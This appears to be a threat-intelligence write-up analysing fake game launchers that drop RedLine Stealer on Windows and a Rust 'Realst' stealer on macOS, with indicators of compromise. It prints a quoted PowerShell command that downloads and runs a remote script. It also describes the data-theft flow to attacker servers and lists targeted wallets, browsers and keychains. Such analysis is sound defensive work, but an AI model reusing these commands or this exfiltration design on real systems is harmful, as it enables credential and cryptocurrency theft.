Olymp of Reptiles code input

This one is unique. It simply checks whether if the code is valid and then redirects to the download link. Since ?dl=1 was queried, the target doesn't see the Dropbox page; rather the file is downloaded immediately (or if the target has enabled the "ask where to save each file" then is prompted to do so).

JavaScript (5-8-2023 to 5-27-2023)

$('.play-btn-a').click(function(){
    $.ajax({
        url: '/check.php',
        method: 'POST',
        dataType: 'html',
        data: {"code": $('.login-code').val()},
        success: function(data){
            if(data == 'Valid'){
                $(".invalide-code").css('opacity', '0');
                document.location.href='/download.php';
            }
            else{
                $(".invalide-code").css('opacity', '1');
            }
        }
    });
})

Code checking via POST to hxxps[://]olympreptiles[.]com/check[.]php

Retrieving the download location via GET to hxxps[://]olympreptiles[.]com/download[.]php

Overlapping workers

@MonkeyyDrainer was both present on Pearl Land Metaverse and Evolion

@Ombrre was both present on Evolion and Destruction

This can be a good indication that the same group is behind this malware campaign. Further evidence will be provided below.

RedLine Stealer - Windows

Heads up, execution chains 1 to 4 make use of the NSIS installer and Electron framework.

Execution Chain 1

NSIS installer (.exe) -> Electron application (.exe) -> check if registration/login is successful -> JSON data retrieval -> JSON data into a buffer to a file (.exe) -> RedLine

Continuing the discussion about the Windows launcher for Destruction earlier...it checks first whether the registration or login is successful via the api.php earlier, which can be seen below.

Registration and login checking

If successful, launchApp() will be called, then:

• The file name is generated (DestructionGame + random number from 0 to 10 + .exe)

• If the file name already exists, then it is executed and the malicious actors will be notified (sendRequest() -> POST to https://playdestruction[.]com/api[.]php)

• Otherwise, the JSON data will be retrieved, and the malicious actors will be notified along the way.

• It will then be converted into a buffer and then written into a file

• Finally, the file size is inflated with 750,000,000 bytes of garbage data and then executed as a child process. It connects to the C&C server 78.153.130[.]209:29996

Loading the RedLine malware

Here's the output from http://launchersgame[.]eu-4[.]evennode[.]com/getbytes/d The magic header can be seen in the first two bytes, then so on and so forth.

5c5a614e7fd08e67dcb2d584f6877c682e9e17d291c7e4ccdb07e7afd6b5f277 DestructionGame7.exe

Worth mentioning that even though it checks for the installed version of the .NET framework, it does not stop the user from proceeding even if the target version of at least 4.8 is not met.

A similar method is observed for GuardiansLauncher.exe / GuardiansCatalog.exe (SHA256: 026518bd9d1721b15a10380778cc81acf59cf7e68152c9bd7b953ff38375c3ce). However, the only difference is that it doesn't have the referral code field.

This one retrieves the bytes.json from http://sandersrocketaa.eu-4.evennode[.]com/getbytes/g . The RedLine Stealer build connects to the C&C: 212.113.116[.]143:29996

Execution Chain 2

NSIS installer (.exe) -> Electron application (.exe) -> JSON data retrieval -> JSON data into a buffer to a file (.exe) -> RedLine

This one does not validate anything nor notify the malicious actors. Clicking the "JOIN GAME" button will invoke joinBtn() and then injectLauncher() to retrieve the JSON data from http://pearlapi[.]eu-4[.]evennode[.]com/bytes, convert to a buffer, write to a file, and then execute the RedLine Stealer malware, which connects to the C&C server 78.153.130[.]209:29996 again.

45343a963962faf3185dc03f6ee2035add20adb481c70ef0e9b2511f879c8f6b Pearl Land Launcher.exe

Execution Chain 3

NSIS installer (.exe) -> Electron application (.exe) -> JSON data retrieval -> JSON data into a buffer to a file (.exe) -> powershell -> RedLine

This is an updated version of the "Pearl Land Launcher". The executable file that is based on the retrieved new (https://peallandik[.]eu-4[.]evennode[.]com/bytes) JSON data executes a command to download a Powershell script from Discord CDN and runs it.

287ae5fe115dc9e23629c04cd30ebbf12e719538316f6f86681ba54c0f7213bf Pearl Land Launcher.exe drops ceb6cb4805529d4612832c8dd2a49aedd5a3feb9151311f8ab896bcf46411c82 Pearl4.exe

The command is:

C:\WINDOWS\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -WindowStyle hidden [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls11 -bor [System.Net.SecurityProtocolType]::Tls12; IEX(New-Object Net.WebClient).downloadString('https://cdn[.]discordapp[.]com/attachments/1109397205409865741/1109427481150242906/out[.]ps1')

Although the Powershell script is obfuscated, it can still be deobfuscated to give us an overview of what is happening.

Side-by-side view of the obfuscated Powershell script and the deobfuscated version. c9e599da275abf8595baac8b05efe5a608d7e45103c2e921fdc41269d552edcd out.ps1 e6ed4cf603af2549ec43a68005970696959898f297256a51754e2740ba4e852f deobfuscated-out.ps1

Here's a basic overview:

• It is importing VirtualAlloc from kernel32.dll and CallWindowProc from user32.dll

• Allocates a memory

• Copies the shellcode and payload to the allocated memory

• Wait for 10 seconds

• Then execute the shellcode and use the payload to AppLaunch.exe, which connects to C&C server 212.113.116[.]143:46628

Since the payload is encoded in Base64, we can decode it to turn it into an executable file.

CyberChef and DiE screens. Payload: 07e889ad34a429f3295011d92258f5d43a6e015eeb072695fc81535f82b460c1 payload.exe

Execution Chain 4

NSIS installer (.exe) -> Electron application (.exe) -> CMD -> .exe -> .exe -> RedLine

This one does not retrieve any data externally.

Once it opens the Electron application, a command (C:\Windows\system32\cmd.exe /d /s /c "resources\launcherApp\OlympOfReptiles.exe") is done, opening another file that acts as the GUI. It also sends a POST request to hxxp://cdn[.]olympreptiles[.]com/launcher[.]php to notify the malicious actors that the launcher was opened.

main.js of the Electron application

Process tree leading to the command line

Once "INSTALL" is clicked, a fake progress bar is displayed.

7a03645778fdb4669f2b568982a722d19bf2a386bba16399d9a681242b2dbc4f OlympOfReptiles.exe

It then creates a .data file, which is actually a .zip file. It is likely derived from the executable file, given the presence and linking of the zlib1.dll.

zlib1.dll reference

0182b6df116ea6b7537bd843fed4828efdb5057b601844e1e95bead492436186 OlympOfReptilesGame.data (.zip)

The extracted file is a portable executable. The first 4 bytes were populated with "data" (64 61 74 61). Correcting it with the magic header of 4d 5a 90 and a null (00) will fix the file. This is automatically done by the "launcher".

It is the pumped build of the RedLine Stealer malware, which connects to the C&C server 78.153.130[.]209:29996 again.

6b9adb9e33519440e79d13f75d2ffa1a27cd9e419f75c069c0dd0d242b6184f4 OlympOfReptilesGame.exe (pumped) 725d1eba223411dcfa236897d059edb6d19f863a827c28ad4c6430285b7a0362 OlympOfReptilesGame.exe (depumped)

Process tree for OlympOfReptiles.exe

Execution Chain 5

NSIS installer (.exe) -> Electron application (.exe) -> Pastebin -> ZIP archive from Dropbox -> .exe -> RedLine

This execution chain follows the same previously discussed method on the PureLand findings.

6199ba4ad546fa4c33f99a8be12c48aee376b79129743a830c427f2e427a835e RyzeXLauncher.exe

Once the Let's go! button is clicked, it invokes the checkUpdate() function and sends a message with the event name check-update. It then invokes get_update with the obfuscated raw Pastebin (https://pastebin[.]com/raw/kYpkEwn3) as the parameter. The content of the raw Pastebin is https://www.dropbox[.]com/s/k0ejw58dy5u4vsf/Veonikdfkdks.7z?dl=1 (SHA256: 7695a29f94c9ab1075804d5b2682a45abf67f78260a6cdf74fb91eff5e92b847).

It then uses the Dropbox download link in the make_backup function to download the file and save it in the temporary directory with the folder name made up of a random alphanumeric string. The executable file, Veonis.exe (SHA256: f0065ff34a2c065c9b98697fe6cb2368924150face5082a0bf286de7eb623f4c), is extracted from the 7z archive using the filename as the password, which is Veonikdfkdks. It is a pumped build of the RedLine Stealer which connects to the C&C server 78.153.130[.]209:29996 again.

Contents of the extracted ASAR

Content of https://pastebin[.]com/raw/kYpkEwn3

Overview of https://www[.]dropbox[.]com/s/k0ejw58dy5u4vsf/Veonikdfkdks[.]7z

DiE overview for f0065ff34a2c065c9b98697fe6cb2368924150face5082a0bf286de7eb623f4c Veonix.exe

Execution Chain 6

.NET (.exe) -> Pastebin retrieval -> .exe -> .exe -> RedLine

Next, we have a .NET executable file. It acts as a "launcher" to download the so-called "game" file.

e85101062f748f61e87f91bac8abcaa11b5754fb364b8e99cc67b9e7f0283edc Evolion Launcher.exe

Once the "Download" button is pressed, it requests a Pastebin paste (https://pastebin[.]com/raw/eHW6uaDH) and retrieves the file based on it (https://evoliongame[.]com/Evolion[.]sfx[.]exe). It is obfuscated when viewed using dnSpy. The method to deobfuscate it can be replicated in Python.

dnSpy and other screens

Python code

def decompressString(A_0, A_1):
	stringBuilder = []
	for i in range(len(A_0)):
		stringBuilder.append(chr(ord(A_0[i]) ^ ord(A_1[i % len(A_1)])))
	return ''.join(stringBuilder)
   
print("pastebin_url: " + decompressString("\n\u0006\0\u0014#[iK2\t\u0018\u0016+8\v\u001cZ\a?\fi\u0016#\u001fD\a\u0006\rT\a\u0015 \u0018", "brtdPaFdBhkbNZ"))
print("start_delay: " + decompressString("\\Fvd", "nwFTbxUwfRQRXj"))
print("discord: " + decompressString("\n\u0011;\u00137Nm}!\u000f1\u0019:+\u0006K(\u0004k.\u0013\u001cv5'2\0=\u0003", "beOcDtBREfBzUY"))
print("url: " + decompressString("$;\u0004\u0017\u0019cI^\f\f\u001f\u0003\u0003\f\"(\u0011\n\u000fw\u0005\u001e\u0004U", "LOpgjYfqizpojc"))
print("twitter: " + decompressString(" %5\t\u001bLhl-/9.7?:\u007f\"\u0016\u0005Y\u000256495-\u001d)<$", "HQAyhvGCYXPZCZ"))
print("mail: " + decompressString("\n\u0019-\u00047M@{\u0016\u001a\b\u0003\u0011\u0010L\b<[!\u0001\08\u0013\u001c\b", "bmYtDwoTzsfheb"))
print("document: " + decompressString("2\u0013\a\"7\u007fiX2=\u001b\r!94I\u0014;0')\u0018<e\u001d\u000eg", "ZgsRDEFwWKtaHV"))

Evolion.sfx.exe has a ZIP archive on its overlay. Dumping the overlay and extracting its content gives us the final executable file which is the pumped build for the RedLine Stealer malware that connects to the C&C server 78.153.130[.]209:29996 again.

0ad38e279f77fa31979f86788245fcf8536e3341d24b56166f64d60daa98343a Evolion.sfx.exe 54c7aded200fbb2fa0c5cbfd87721d99227532441a2da24b826b23377178384e Evolion.exe (pumped) 359a42f042d2782241a6a1a185841c58fe06c2f091327a374587a3c42e547004 Evolion.exe (depumped)

Execution Chain 7

.NET (.exe) -> ZIP archive retrieval -> .exe -> RedLine

This one is similar to execution chain 6.

93dc05053f3e84a67c89d47f8d49ca02f2287bd5d758486bc26207d64e670106 Evolion Launcher.exe

Clicking the "Download" button retrieves a ZIP archive from http://evolion1.beget[.]tech/lklp21[.]zip with a password of lklp21

The ZIP archive contains the pumped build of RedLine Stealer which connects to C&C 78.153.130[.]209:29996 again

4968134c22d748f412dae4b39c292468ed4d8859abf81926a80dc5aefbac7ee6 Evolion.exe

Execution Chain 8

.NET (.exe) -> disabling defender -> .exe -> loaded with MS Edge WebView2 -> .zip download from Dropbox -> .exe -> RedLine

This .NET executable file which also acts as a "launcher" disables Windows Defender first.

dnSpy view of 8c08cc591257fa8a18ecfce9f8f9da262442b26e90c6cf018d744d0daaa671ca Brawlearth.exe

After that, it retrieves another executable file inside it as well as the WebView2Loader.dll to use the MS Edge WebView2. These are stored in the Documents folder.

Documents folder screen

The user is then presented with a GUI that gives an option to download the "game" files.

a1913ac486f3c145c7aaa51fecf7997e3c654f8236c93db473f3a2e9297a2f04 BrawlEarth.exe

Clicking the download button retrieves a ZIP archive from Dropbox named Game.zip which can be unlocked with a password of J$~U9vu(Wl8%`wq

Thanks to the memory dump showing this: {"cmd":"downloader","callback":2182914116,"error":2614970778,"url":"https://www[.]dropbox[.]com/s/kesgp2k48srhkiv/Game[.]zip?dl=1","path":"./Game.zip","password":"J$~U9vu(Wl8%`wq","id":"module"}

https://www[.]dropbox[.]com/s/kesgp2k48srhkiv/Game[.]zip

The extracted executable file is a pumped build of a RedLine Stealer malware which connects to the following C&C servers (also used on the discussed execution chains earlier):

• 78.153.130[.]209:29996 (checked on 5/24/2023 - file shown on the left)

• 212.113.116[.]143:23052 (checked on 6/7/2023 - same IP but different port from earlier - file shown on the right)

419f08a38169939a3d66dd1eda58ae7748defef460c8679be928bdd22f477ce3 gakljeqwkfqw.exe (pumped - left) 36daf6de128b4d0e20e5aee53e4d8b57fbc6beb5f25caf4e91fe0843cc651b17 gakljeqwkfqw.exe (depumped - left) e71580e869ce137a031d810cfdaee330e4fb240a6431f4a2245d98f7baad6553 gakljeqwkfqw.exe (pumped - right) 638c313209189f54848aa0ae0a1d58039975e0200e21ce28401234e7d2a3913a gakljeqwkfqw.exe (depumped - right)

Execution Chain 9

.exe -> RedLine

This one is a plain pumped build of the RedLine Stealer malware which connects to the C&C server 78.153.130[.]209:29996 again. The RAR archive can be opened using the password EvolionGame.

2c93a590c816763dc82e3180e205377639e66723659363140432b1093aa5d533 Evolion.rar f0bdc66aa99469763f98c4a76f43adeb9b8ae8696e3ea19a22811fc9b15d1e78 Evolion.exe (pumped) 69e78f9bd3cbc8d0d097e377bb9be8667313cb00fba0652a514d2658c3d68a97 Evolion.exe (depumped)

Evolion GitHub repository tidbits

Before proceeding with the Realst stealer, let's take a closer look at the Evolion GitHub repository. Where did this repository come from? Check the code.json (5-1-2023) again at the Evolion code input part.

Commit a739b020a7cf7301a8f0c52b209c57c4c8150b60

Launcher2.exe was added to the repository on Mar 29, 2023, 8:00 PM GMT+1

https[://]github[.]com/EvolionBeta/evolion/commit/a739b020a7cf7301a8f0c52b209c57c4c8150b60

The portable executable file has a ZIP archive on its overlay. Dumping it gives us the idea that this was written in JPHP.

DiE screen for 81d5385bb25fa6c64925f60f9480ed9bf250a9a4e05affdc1cb260a348254bdc Launcher2.exe

The entrypoint based on the application.conf is on app/forms/MainForm.phb. As it contains the CAFEBABE magic header, we can remove the other parts of the data and then decompile it using Fernflower. (Great reference: https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp)

5f4f30de6f5e38ad2525dfefb1ddabdb09259e0297222993cfce9c10419d323c MainForm.phb

application.conf and decompiled MainForm.phb

Let's highlight two interesting things:

1. The username ERMAK: C:\Users\ERMAK\DevelNextProjects\Launcher2\src_generated\app\forms\MainForm.php

2. Another GitHub repository and file: https://github[.]com/Joysi888/passwords/raw/main/calc[.]exe

User Joysi888 has only one repository, which is passwords. The repository has two files named Evolion.exe and calc.exe

https://github[.]com/Joysi888

https://github[.]com/Joysi888/passwords

calc.exe (SHA256: 58189cbd4e6dc0c7d8e66b6a6f75652fc9f4afc7ce0eba7d67d8c3feb0d5381f) was uploaded on Mar 28, 2023, 7:59 PM GMT+1. It's a legitimate Windows calculator. This likely indicates that this is done for testing purposes.

https://github[.]com/Joysi888/passwords/blob/main/calc[.]exe

Evolion.exe (SHA256: b3ed25ddfc1ec2ac796a936aa1b90f1489daf2e8520b93d20d9e27e9f3fedf65) was uploaded on Mar 28, 2023, 4:09 PM GMT+1

https://github[.]com/Joysi888/passwords/blob/main/Evolion[.]exe

It's a .NET executable file that retrieves putty.exe from https://the[.]earth[.]li/~sgtatham/putty/latest/w64/putty[.]exe

dnSpy and DiE screens for b3ed25ddfc1ec2ac796a936aa1b90f1489daf2e8520b93d20d9e27e9f3fedf65 Evolion.exe

putty.exe (SHA256: fc6f9dbdf4b9f8dd1f5f3a74cb6e55119d3fe2c9db52436e10ba07842e6c3d7c) is a legitimate file with a valid digital signature.

fc6f9dbdf4b9f8dd1f5f3a74cb6e55119d3fe2c9db52436e10ba07842e6c3d7c putty.exe

Overall, it seems the malicious actors were trying to test using this other repository.

Commit 3ff21b58124330e9baa9fb9903e2e441f7ccc9d9

Order9947128.txt was added to the repository on Mar 29, 2023, 8:35 PM GMT+1

https://github[.]com/EvolionBeta/evolion/commit/3ff21b58124330e9baa9fb9903e2e441f7ccc9d9

eu3030206:RXsIoDEIKo@212.107.27[.]225:7952
eu3030206:RXsIoDEIKo@212.107.27[.]229:7952
eu3030206:RXsIoDEIKo@212.107.27[.]230:7952
eu3030206:RXsIoDEIKo@212.107.27[.]231:7952
eu3030206:RXsIoDEIKo@212.107.27[.]232:7952
eu3030206:RXsIoDEIKo@212.107.27[.]233:7952
eu3030206:RXsIoDEIKo@212.107.27[.]228:7952
eu3030206:RXsIoDEIKo@212.107.27[.]227:7952

It seems to be following a format of username:password@IPaddress:portNumber. As to where and how it is used, I have no idea...

Commit 8cce0ef8fea028f1881d6ad1b3b383b94fc28cba

LoaderWPF.rar was added to the repository on Apr 23, 2023, 1:36 PM GMT+1

https://github[.]com/EvolionBeta/evolion/commit/8cce0ef8fea028f1881d6ad1b3b383b94fc28cba

It contains the source code for the fake game launcher as seen on execution chain 6. Previous builds used https://pastebin[.]com/raw/yJekgtkE which can be seen on the image below.

Contents of 34afc952bc01a3320c565824fede51573eac1f055a4cbca2d3c11e20a89bf08a LoaderWPF.rar

Fake game launcher view on Microsoft Visual Studio

Commit 71527377ff76e535f7941002cdbabd9fc419a986

repos.rar was added on Apr 26, 2023, 5:55 AM GMT+1

https://github[.]com/EvolionBeta/evolion/commit/71527377ff76e535f7941002cdbabd9fc419a986

It contains the source code for the fake game launcher and the builder so they can easily create a new build with the updated environments configuration.

Contents of cadc7a5a322f96b152a2382ee487d639188a7737eec750342e9fb1f9c2ba0ffe repos.rar

Builder view on Microsoft Visual Studio

Realst Stealer - macOS

Why "Realst"?

Now, why did I call it "Realst"? I couldn't find anything that can be attributed to its proper name, such as a post on forums or marketplaces, whether it is about selling it or anything else. As this is written in Rust, I based it on its crate name given these symbols. (crate_name::module::function::hash)

Sorted (A->Z) symbols from 2af0e212ad70eaf8b96a645045ef2764700b5adf7b1187ae3d82240f96f613e2 realst

Sorted (A->Z) symbols from 0a4f053791180ed2b3f95774dd11e0b87a72ad8681e28ea70df790d5fb955525 BrawlEarth

Targeted data

==== Browsers ====

Browser name	Bundle identifier / path
Google Chrome	Google/Chrome
Brave	BraveSoftware/Brave-Browser
Opera	com.operasoftware.Opera
OperaGX	com.operasoftware.OperaGX
Firefox	Firefox
Vivaldi	Vivaldi

==== Cryptocurrency wallets - browser extensions ====

Extension name	Identifier
Metamask	nkbihfbeogaeaoehlefnkodbefgpgknn
Binance Wallet	fhbohimaelbohpjbbldcngcnapndodjp
Trust Wallet	egjidjbpglichdcondbcbdnbeeppgdph
Martian Wallet	efbglgofoippbgcjepnhiblaibcnclgk
Pontem Aptos Wallet	phkbamefinggmakgklpkljjmgibohnba
Petra Aptos Wallet	ejjladinnckdgjemekebdpeokbikhfci
TronLink	ibnejdfjmmkpcnlpebklmnkoeoihofec
Nami	lpfcbjknijpeeillifnkikgncikgfhdo
Temple	ookjlbkiijinhpmnjffcofjonbfbgaoc
Phantom	bfnaelmomeimhlpmgjnjophhpkkoljpa

==== Others ====

Name	Path
Telegram	/Library/Application Support/Telegram Desktop/tdata
Keychain	/Library/Keychains/login.keychain-db

Execution Chain 1

Package (.pkg) -> Mach-O -> Realst

Opening the package file will display the regular installer window. Take note of Evolion 1.6.2, we will see it again later.

e581b456d13a52ac58f91f47916950b6e7442c54d7dfb15b76fff844e00e0382 Evolion.pkg

Before continuing those steps, let's extract the file using unar. Based on the script of the Distribution.xml, the malicious actors target Mac OS X 10.12 or later versions.

After going through all those steps, the postinstall script launches the Mach-O executable file, and a terminal will be displayed which asks for your password to install the "game". What happens here onward is the exfiltration of the stolen data.

Launching Mach-O 03044ce1dea80b43b94497cc7bad22eb3e9c4c7bd4b4d13f74432152fed19411 Evolion

Once the Mach-O executable file is opened, it sends a notif to a C&C via POST tohttp://77.91.84[.]110:8000/opened with a multipart/form-data encoding type to send the buildName, buildVersion, and uid.

Wireshark capture

After entering the device's password, a "loading" screen will be displayed. It then makes use of the game.py and installer.py scripts to aid in exfiltration.

• The game.py (SHA256: 1a5db06dca0667a72d24e092c81f1a3a6d8b535696813012cdc636fc652de743) script's original filename is firefox_decrypt.py by unode - https://github.com/unode/firefox_decrypt

Firefox Decrypt is a tool to extract passwords from profiles of Mozilla (Fire/Water)fox™, Thunderbird®, SeaMonkey® and derivates.

game.py's contents

• The installer.py (SHA256: 8050a585fe1d534cafecaa56bda08ce2ef3bc26ea2b0ddad90c6b0c2be1ef3af) script is a combination of scripts from n0fate's chainbreaker - https://github.com/n0fate/chainbreaker

Chainbreaker can be used to extract the following types of information from an OSX keychain in a forensically sound manner

installer.py contents

It also determines the victim's geolocation by using https://api[.]db-ip[.]com/v2/free/self (same method to all execution chains).

Additional fingerprinting is done by getting the operating system's info and username of the device (same method to all execution chains).

Once the fingerprinting and retrieval of files are done, the data gets compressed into a ZIP archive. A POST request is then sent to http://77.91.84[.]110:8000/analytics with a multipart/form-data encoding type again to send the victim's device info, the ZIP archive, and a screenshot of the victim's device.

Form field names:

• name

• logs_id

• text

• ch_text

• photo

• archive

Wireshark capture

If permission to capture the device's screen is not yet granted to the terminal, a prompt will show up.

The gathered data can be seen in the user's main directory. It will be deleted after the POST request to their analytics endpoint is done.

The previous builds stored the gathered data in the same folder of the Mach-O file and the Python scripts. The Python scripts then get deleted along with the data once the exfiltration is done. Some of them make use of another port as well, such as http://77.91.84[.]110:5000/opened (seen on Pearl Land Launcher without the other form fields too) and the endpoint for exfiltration is not analytics but http://77.91.84[.]110:5000/send_analytics (no logs_id in the form field).

From 2c0cc8b60e502e9a2a82a1a6acdfa340ff43608dd6fdad32db9ce99b383513e3 Evolion.pkg

Wireshark capture

Wireshark capture

Also worth mentioning is that an early build, Pearl Land Launcher v3.pkg (SHA256: a0b8789ef3249b5fa8eb3590cd6f183e24273b5886560233025fc9d8de52ce0b) with the build name of PearLand [1.5.4] doesn't have a validate_opening function.

Symols of 149784b07294ec991db4ed913ff726a602d6e071899ddb051a05498a3790bd63 PearLand

Wireshark capture

Speaking of an early build, I also realized that the earliest sample I acquired was on March 28, 2023. It doesn't have the validate_opening function as well. The external script chainbreaker is only present. And for some reason, they forgot to remove the RyzeXLauncher Mach-O from their other fake project (both Mach-O files has the same hash - though they previously based the build name depending on the file name with the version hardcoded).

Symbols of 016a1a4fe3e9d57ab0b2a11e37ad94cc922290d2499b8d96957c3ddbdc516d74 GuardiansInstaller

contents of 4b93ec3fd49c0111e8a11ac8a0a197f5366cda19732932ce4cb84e024c648a38 GuardiansInstaller.pkg

Wireshark capture

Execution Chain 2

Disk Image (.dmg) -> .app -> Mach-O -> .zip archive from Dropbox -> Mach-O -> Realst

Opening the disk image file will mount the virtual disk and display a window indicating that it's an installer package (drag the app to the Applications folder).

A GUI is displayed after running the application, which seems to be a "launcher" like interface.

fe3ac61c701945f833f218c98b18dca704e83df2cf1a8994603d929f25d1cce2 Brawl Earth

Based on its Info.plist, the minimum macOS version to run the application is 10.13

Info.plist view

It's interesting to see the Realst symbols are here, but with the crate_name changed to brawlearth, and they are unused. Only the downloader is utilized here.

Once the download button is clicked, it retrieves a ZIP archive from Dropbox (https://www[.]dropbox[.]com/s/8m88qcmbz7obygw/MacBrawlEarth[.]zip?dl=1) and saves it into the downloads directory with a filename of MacBrawlEarth.zip

Downloading MacBrawlEarth ZIP archive

The MacBrawlEarth.zip archive contains the BrawlEarth Mach-O, and the two Python scripts again.

78b2fa0df9fba56ba6a773faa0d280977a1a830fce4f2427935f87de11cb9012 MacBrawlEarth.zip

The two Python scripts here are just the same scripts from earlier, the difference is just the comments were modified.

The initial comments for game.py (SHA256: 0cd929f660a012e390c9098f3dc6d7f41ae32f472f3f266d86789e2b5d1ceee0) were simply removed.

0cd929f660a012e390c9098f3dc6d7f41ae32f472f3f266d86789e2b5d1ceee0 game.py

The initial comments for installer.py (SHA256: 28549faab4a2757dc4eb922a7ad3bfa7981f9a132218ae530856ae6da3bc03e6) were removed as well. However, some of its functionalities that were commented out were re-enabled.

28549faab4a2757dc4eb922a7ad3bfa7981f9a132218ae530856ae6da3bc03e6 installer.py

Just like the previously discussed execution chain, it sends a POST request to http://77.91.84[.]110:8000/opened with the same form data (buildName, buildVersion, uid) once the BrawlEarth Mach-O file is opened.

Wireshark capture

A terminal window is launched as well.

The gathered data is also temporarily stored in the user's main directory, and a POST request is done to http://77.91.84[.]110:8000/analytics finish the exfiltration.

Wireshark capture

Execution Chain 3

ZIP archive -> Disk Image (.dmg) -> .app -> Electron application (Mach-O) -> login/register validation -> .app -> Mach-O -> Realst

Like the execution chain 2, this is another installer package.

15a1194ef9caa96a696001dd2d79dc90497189f6d38f617efa8f8cfa6be4563d Destruction-x64.dmg.zip f05dc9f39141b886a57b1f07c220030333f50af530c8a5663b9ed6f667111969 Destruction-x64.dmg

A launcher interface is then displayed after running the Destruction application.

a8d40bfa8622e8c52dc03aee305337f3c44fffca1f2fe46959d8e7e04295696b Destruction

The configuration and metadata of the application give us an insight that the minimum targeted macOS version is still 10.13, and the Electron framework is used here, just like the execution chain 1 for Destruction - RedLine.

Info.plist details

It also retained some files (such asapi.php) and functions (such as inflateFile). If the registration/login is valid, it invokes the launchApp function and opens the Launcher.app located in the Resources folder as well. For some reason, they also included another Disk Image (.dmg) file here; we will take a look at it later.

Extracted app.asar

Launcher.app in the Resources folder

Unlike earlier, where it uses a Python script directly, they are now converted to a frozen/bundled executable.

The Firefox Decrypt a.k.a game frozen/bundled executable is located at Resources/game/ and makes use of the library.zip (SHA256: ff7b879e7fb4f58c954e46125f0c58f2e413a8a729c5e9e3353152cc8e2509f8) at Resources/game/lib/.

The Chainbreaker a.k.a installer frozen/bundled executable is located atResources/extensions/ and makes use of the library.zip (SHA256: 64fec4bcd85b3e2129c0e1f3a0201f6effb5667f52067caeba21cade08cd7b94) at Resources/extensions/lib/.

The crate_name was also changed from realst to Launcher. Just like on the execution chain 2 for the downloader.

Symbols for ccbb7510e84df49e1e6bd523ec739ddec71b67e84269d065b0d0ea3942f30471 Launcher

Once the Launcher.app is executed, it invokes the validate_opening function to send a POST request to http://167.172.103[.]83:8080/opened (for some reason, they named this build as test...)

Wireshark capture

After a while, a prompt asks for the victim's device password. It is noticeable that it does not display and use the terminal compared to the previously discussed execution chains.

To install please enter your password.

All data is safe

password prompt

The gathered data is then temporarily stored in the Downloads folder with a folder name of brawl. They forgot to rename from their previous build, as seen on execution chain 2 - BrawlEarth.

gathered data at Downloads/brawl

A POST request is then sent to http://167.172.103[.]83:8080/analytics to finish the exfiltration. There's no photo in the form field since the screenshot file is compressed as part of the data.zip.

Wireshark capture

Extra Disk Image from execution chain 3

Interestingly, it is a digitally signed version of execution chain 3.

codesign results

Executable=/Volumes/Destruction/Destruction.app/Contents/MacOS/destruction
Identifier=com.electron.destruction
Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20500 size=484 flags=0x10000(runtime) hashes=4+7 location=embedded
VersionPlatform=1
VersionMin=658688
VersionSDK=852736
Hash type=sha256 size=32
CandidateCDHash sha256=364f8f1ae69281801912e62f28c60dab3e7ac49f
CandidateCDHashFull sha256=364f8f1ae69281801912e62f28c60dab3e7ac49f119c8133f9300033632bce8d
Hash choices=sha256
CMSDigest=364f8f1ae69281801912e62f28c60dab3e7ac49f119c8133f9300033632bce8d
CMSDigestType=2
Executable Segment base=0
Executable Segment limit=8192
Executable Segment flags=0x1
Page size=4096
CDHash=364f8f1ae69281801912e62f28c60dab3e7ac49f
Signature size=9099
Authority=Apple Development: suoeruserff1@proton.me (4HPD8URJUF)
Authority=Apple Worldwide Developer Relations Certification Authority
Authority=Apple Root CA
Timestamp=Jun 16, 2023 at 12:20:53 AM
Info.plist entries=30
TeamIdentifier=C46287MB25
Runtime Version=13.3.0
Sealed Resources version=2 rules=13 files=2590
designated => identifier "com.electron.destruction" and anchor apple generic and certificate leaf[subject.CN] = "Apple Development: suoeruserff1@proton.me (4HPD8URJUF)" and certificate 1[field.1.2.840.113635.100.6.2.1] /* exists */

Wireshark capture

Wireshark capture

Execution Chain 4

ZIP archive -> Disk Image (.dmg) -> .app -> Electron application (Mach-O) -> .app -> Mach-O -> Realst

This one is similar to execution chain 4. The only difference is that there is no login/register validation.

8e47262e3a2bdfb7d463d7fc2690644ba3a07701404a73fb7f158b2685702f23 Dawn Land Launcher (macOS).zip a77010274b411bb2610c0dbb4336cc0f6778a9836f0416f09657c11212e51458 DawnLand-x64.dmg

44fe3ce6ffec6f04e189405d1f644ebc8fcf1982792e589caf5c33acbe7b8631 DawnLand

"JOIN METAVERSE" button will execute "Launcher.app" in Resources

Same library.zip as well.

A POST request to http://167.172.103[.]83:8080/opened again

Wireshark capture

Then the same password prompt from execution chain 3.

Same password prompt

Gathered data are also temporarily stored at Downloads/brawl/

Permission prompt to access the Downloads folder

And lastly, the POST request to http://167.172.103[.]83:8080/analytics

Wireshark capture

Execution Chain 5

ZIP archive -> Disk Image (.dmg) -> .app -> Mach-O -> Realst

This one is fascinating since it has a fake downloader.

c729f5715ca5a6039562d9cc52b65cc7ce16ef1ed1451cfc812c7654fa8e3c48 WildWorld.zip 8d506b3527714b7d18d4c9ba292b940aa455876c7bac03b13b00645236f25888 WildWorld.dmg

2c321b1416fb7226bffd1633a2a053ef3921fef9a1de5c49b71ef9c7b0914b00 WildWorld

The downloader function is present here.

Symbols

Firefox Decrypt (Resources/game/game) and Chainbreaker (Resources/extensions/installer) are included as well. 10.13 is still the minimum version based on Info.plist

After clicking the download button, a POST request is sent to http://167.172.103[.]83:8080/opened

Wireshark capture

Since the downloader function is present as seen earlier, it tries to retrieve https://www.dropbox[.]com/s/8m88qcmbz7obygw/MacBrawlEarth[.]zip?dl=1. The same Dropbox link from the fake project - BrawlEarth. If it fails, it simply proceeds to use its built-in stealer functionality.

Dropbox link

A prompt then asks for the device password.

To install WildWorld, please enter the password

Once the password is entered, it proceeds to gather data. It is still temporarily stored at Downloads/brawl/

A POST request is still done to http://167.172.103[.]83:8080/analytics to exfiltrate the gathered data

Wireshark capture

The DOWNLOADING button then turns into a PLAY button. However, this just repeats the gathering of data and exfiltration. Though the password prompt will now say:

Something went wrong. Please reinstall.

Revisiting Execution Chain 1

0xSaiyanElite pinged about whether I had any idea about a macOS file that he came across. It turns out it is from the DawnLand fake project.

e9f1012ed31062dfb4e1f8e6df7b1c07e0bf3c3b75d2bce80c724c03c56d09b3  Dawn Land Launcher (macOS).pkg

It is the latest version of the malware based on the developments from execution chains 1 to 5. Though the flow is Package (.pkg) -> Mach-O -> Realst, hence "revisiting".

